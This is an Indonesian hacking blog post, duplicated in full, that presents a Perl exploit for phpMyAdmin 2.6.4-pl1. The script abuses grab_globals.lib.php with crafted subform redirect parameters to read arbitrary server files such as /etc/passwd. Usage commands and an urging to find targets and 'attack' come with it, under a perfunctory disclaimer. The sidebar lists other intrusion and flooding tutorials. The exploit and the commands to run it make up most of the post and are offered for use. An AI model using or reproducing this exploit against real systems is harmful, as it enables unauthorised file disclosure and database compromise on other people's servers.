- Home »
- Cara membuka akses keseluruhan dari database
Fatkhan
On Selasa, 02 Juni 2009
Membanjiri Pesan Ke Telepon Seluler Melalui Bluetooth MySQL Exploit via PHP Script Cara membuka akses keseluruhan dari database Membuat File Super Hidden Attack: Script Sanitasi Input Hack Website Shopping With shopupload.asp Deface with PHP Bugs Mencari Alamat Target In One Hosting Memberi Logo Pada Properties My Computer Mencurangi (hampir) Semua Jenis Billing Warnet XRemote (Trojan Dan Remoter PC Berbasis Windows) Melakukan Jebakan Hacking Password di Friendster Menjebol Password PC Security tanpa ketahuan MEMBUAT ANTI VIRUS PADA FLASHDISK Digital Blaster.Internet & Network Flooder /Apa?/Bagaimana?/ Cara membuka akses keseluruhan dari database Membuat File Super Hidden Attack: Script Sanitasi Input Hack Website Shopping With shopupload.asp
Cara membuka akses keseluruhan dari database
Phpmyadmin biasa nya tempat kita membuka akses keseluruhan dari database
dan tempat kita membuat,menghapus dan memanipulasi data jadi phpmyadmin
adalah tempat yang sangat rahasia bagi sang admin nah apa jadi nya kalo tempat
yang sangat sakral itu bisa di buka ??? wah... gawat donk...
PERINGATAN ADMIN : PATCH YOUR SERVER NOW!!!
so apa lagi.... Lets rock and roll, sebelum kita melangkah lebih jauh
mari kita analisis di mana lubang untuk kita susupi ke dalam sistem
1. Direktory phpmyadmin biasa nya ada di
http://www.target.com/phpmyadmin/ nah apabila direktory itu tidak di
proteksi maka gawat donk jadi biasa nya tempat itu pasti di password...
nah loh gimana kita masuknya??? jangan panik.... lanjut saja
2. file vulnerable yang bisa kita intip maka berdasarkan hal di atas ( duh kek
lagi kuliah aja yah formal banget ) , mari kita membuat exploit sederhana
[dokter@localhost exploit]$ cat > phpmyadmin.pl
#!/usr/bin/perl
use IO::Socket;
# dokter^cinta
# bruteforce team @dalnet
#
# exploit phpMyAdmin 2.6.4-pl1
#
#
# Greatz to all my friends
# thanks for your idea to make this exploit
#
# Contact : dokter.cinta[at]gmail.com
# Website : http://Forum.doktercinta.org
#
if (@ARGV < 3)
{
print " Modified By: Dokter^cinta @ dalnet ";
print "EXpl01T phpMyAdmin 2.6.4-pl1 ";
print " ";
print "perl phpmyadmin.pl target /DIR/ FILE ";
print "target - target dimana ada phpmyadmin contoh: http://localhost ";
print "DIR - Direktori untuk PMA contoh: /phpMyAdmin- 2.6.4-pl1/ ";
print "FILE - file untuk di intip ../../../../../etc/passwd ";
print "contoh cmd: perl phpmyadmin.pl http://localhost /phpMyAdmin-2.6.4-pl1/
../../../../../etc/passwd ";
print " Bruteforce Team @dalnet ";
exit();
}
$HOST = $ARGV[0];
$DIR = $ARGV[1]."libraries/grab_globals.lib.php";
$FILE = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".
$ARGV[2].
"&subform[1][cXIb8O3]=1";
$LENGTH = length $FILE;
print " target adalah: ".$HOST." ";
$HOST =~ s/(http:\/\/)//;
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST",
PeerPort => "80") || die "Error 404 ";
print $get1 "POST ".$DIR." HTTP/1.0 ";
print $get1 "Host: ".%HOST." ";
print $get1 "Content-Type: application/x-www-form-urlencoded ";
print $get1 "Content-Length: ".$LENGTH." ";
print $get1 $FILE;
while ($odp = <$get1>)
{
if ($odp =~ /Warning<\/b>: main\(\): akses ditolak hikz hikz hikz .\/$ARGV[2]
in
/ ) {
printf " File ".$ARGV[2]." tak ada om :( . ";
exit;
}
printf $odp;
}
maka kita cari target yang pake phpmyadmin
lalu apa lagi....??? yah serang !!!!!!!!!!!!!!!!!!!
[dokter@localhost exploit]$ perl phpmyadmin.pl www.target.com /phpMyAdmin-2.6.4-pl1/
../../../../../etc/passwd
target adalah : www.target.com
dan good luck
you got their database
:P
===========================================================
WARNING !!!
saya tidak bertanggung jawab atas penyalah gunaan dari artikel ini
dan ini hanya sebagai ilmu pengetahuan belaka
jadi sekali lagi ...
PLEASE DONT TRY THIS AT OTHER PEOPLE PCS
TRY THIS WITH YOUR OWN RISK
Cara membuka akses keseluruhan dari database
Phpmyadmin biasa nya tempat kita membuka akses keseluruhan dari database
dan tempat kita membuat,menghapus dan memanipulasi data jadi phpmyadmin
adalah tempat yang sangat rahasia bagi sang admin nah apa jadi nya kalo tempat
yang sangat sakral itu bisa di buka ??? wah... gawat donk...
PERINGATAN ADMIN : PATCH YOUR SERVER NOW!!!
so apa lagi.... Lets rock and roll, sebelum kita melangkah lebih jauh
mari kita analisis di mana lubang untuk kita susupi ke dalam sistem
1. Direktory phpmyadmin biasa nya ada di
http://www.target.com/phpmyadmin/ nah apabila direktory itu tidak di
proteksi maka gawat donk jadi biasa nya tempat itu pasti di password...
nah loh gimana kita masuknya??? jangan panik.... lanjut saja
2. file vulnerable yang bisa kita intip maka berdasarkan hal di atas ( duh kek
lagi kuliah aja yah formal banget ) , mari kita membuat exploit sederhana
[dokter@localhost exploit]$ cat > phpmyadmin.pl
#!/usr/bin/perl
use IO::Socket;
# dokter^cinta
# bruteforce team @dalnet
#
# exploit phpMyAdmin 2.6.4-pl1
#
#
# Greatz to all my friends
# thanks for your idea to make this exploit
#
# Contact : dokter.cinta[at]gmail.com
# Website : http://Forum.doktercinta.org
#
if (@ARGV < 3)
{
print " Modified By: Dokter^cinta @ dalnet ";
print "EXpl01T phpMyAdmin 2.6.4-pl1 ";
print " ";
print "perl phpmyadmin.pl target /DIR/ FILE ";
print "target - target dimana ada phpmyadmin contoh: http://localhost ";
print "DIR - Direktori untuk PMA contoh: /phpMyAdmin- 2.6.4-pl1/ ";
print "FILE - file untuk di intip ../../../../../etc/passwd ";
print "contoh cmd: perl phpmyadmin.pl http://localhost /phpMyAdmin-2.6.4-pl1/
../../../../../etc/passwd ";
print " Bruteforce Team @dalnet ";
exit();
}
$HOST = $ARGV[0];
$DIR = $ARGV[1]."libraries/grab_globals.lib.php";
$FILE = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".
$ARGV[2].
"&subform[1][cXIb8O3]=1";
$LENGTH = length $FILE;
print " target adalah: ".$HOST." ";
$HOST =~ s/(http:\/\/)//;
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST",
PeerPort => "80") || die "Error 404 ";
print $get1 "POST ".$DIR." HTTP/1.0 ";
print $get1 "Host: ".%HOST." ";
print $get1 "Content-Type: application/x-www-form-urlencoded ";
print $get1 "Content-Length: ".$LENGTH." ";
print $get1 $FILE;
while ($odp = <$get1>)
{
if ($odp =~ /Warning<\/b>: main\(\): akses ditolak hikz hikz hikz .\/$ARGV[2]
in
/ ) {
printf " File ".$ARGV[2]." tak ada om :( . ";
exit;
}
printf $odp;
}
maka kita cari target yang pake phpmyadmin
lalu apa lagi....??? yah serang !!!!!!!!!!!!!!!!!!!
[dokter@localhost exploit]$ perl phpmyadmin.pl www.target.com /phpMyAdmin-2.6.4-pl1/
../../../../../etc/passwd
target adalah : www.target.com
dan good luck
you got their database
:P
===========================================================
WARNING !!!
saya tidak bertanggung jawab atas penyalah gunaan dari artikel ini
dan ini hanya sebagai ilmu pengetahuan belaka
jadi sekali lagi ...
PLEASE DONT TRY THIS AT OTHER PEOPLE PCS
TRY THIS WITH YOUR OWN RISK